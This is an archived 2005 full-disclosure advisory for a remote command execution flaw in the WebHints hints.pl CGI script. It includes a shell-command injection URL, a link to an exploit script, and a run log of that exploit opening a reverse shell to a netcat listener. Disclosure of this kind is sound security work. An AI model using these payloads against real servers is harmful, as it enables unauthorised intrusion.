lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200506150042.j5F0fkg1008653@m-01.th.seeweb.it>
Date: Wed, 15 Jun 2005 02:41:39 +0200
From: "Emanuele \"MadSheep\" Gentili" <emanuele@...ietolug.org>
To: "'Emanuele \"MadSheep\" Gentili'" <emanuele@...ietolug.org>,
	<burgdorf@...d.com>, <submit@...w0rm.com>,
	<submissions@...ketstormsecurity.org>, <bugtraq@...urityfocus.com>,
	<Exploits@...irt.com>
Subject: MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability

MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability



	 
06/11/2005
 
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability

Published: 06 11 2005

Released: 06 11 2005

Name: WebHints

Affected Systems: <= 1.03

Issue: Remote Command Execution Vulnerability

Author: Emanuele "MadSheep" Gentili

Vendor: http://awsd.com/scripts/





Description

***********
Madroot Security group has discovered a flaw in WebHints <= 1.02. There is a
vulnerability in the current version of 
WebHints. This issue occurs due to insufficient sanitization of externally
supplied data to the hints.pl script 
that allows a remote user to pass an arbitrary shell command which will be
executed by the script. An attacker may 
exploit this vulnerability to execute commands in the security context of
the web server hosting the affected script.



Details

*******


It's possibile for a remote attacker to retrieve any file from a webserver
and execute it. Multiple files are affected with this problem.

For example try this:

http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|


POF

*******


Exploit: http://madsheep.altervista.org/M4DR007-hints.pl


emanuele@...ckbox:~$ perl new.pl


 ~~ www.madroot.edu.ms Security Group ~~

 WebHints Software hints.cgi
 Remote Command Execution Vulnerability
 Affected version: <= all
 ~~ code by MadSheep ~~


 06.11.2005


hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350


~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
[*] try to exploiting...
[*] OK!
[*] NOW, run in your box: nc -l -vv -p 7350
[*] starting connect back on 127.0.0.1 :7350
[*] DONE!
[*] Look netcat windows and funny

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable


We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk


emanuele@...ckbox:~$


emanuele@...ckbox:~$ nc -l -vv -p 7350

 uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)



							enJoy

Solution

*********

The vendor has been contacted and a patch was not yet produced.





Credits
*******

Emanuele "MadSheep" Gentili - emanuele@...ietolug.org - www.madsheep.edu.ms

Come cheer us at #madroot on Freenode ( irc.freenode.net )

(C) 2004 Copyright by madroot Security Group


Download attachment "M4DR007-hints.pl" of type "application/octet-stream" (3446 bytes)

View attachment "MADSHEEP-05SA-hints.txt" of type "text/plain" (2524 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ